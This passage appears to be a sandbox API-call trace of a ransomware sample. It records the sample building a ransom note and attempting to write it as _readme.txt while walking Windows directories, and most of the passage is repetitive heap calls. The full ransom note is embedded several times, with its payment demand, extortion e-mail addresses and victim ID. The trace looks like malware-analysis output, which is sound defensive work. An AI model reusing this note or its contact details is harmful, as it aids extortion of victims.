hHeap=0x620000) returned 1 [0184.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.584] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0184.584] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.584] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.584] PathFindFileNameW (pszPath="") returned="" [0184.585] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.586] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.586] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.586] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.587] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0184.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.588] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0184.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.589] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.589] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.589] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.591] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*" (normalized: "c:\\boot\\tr-tr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.595] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.595] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.595] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.595] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.596] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 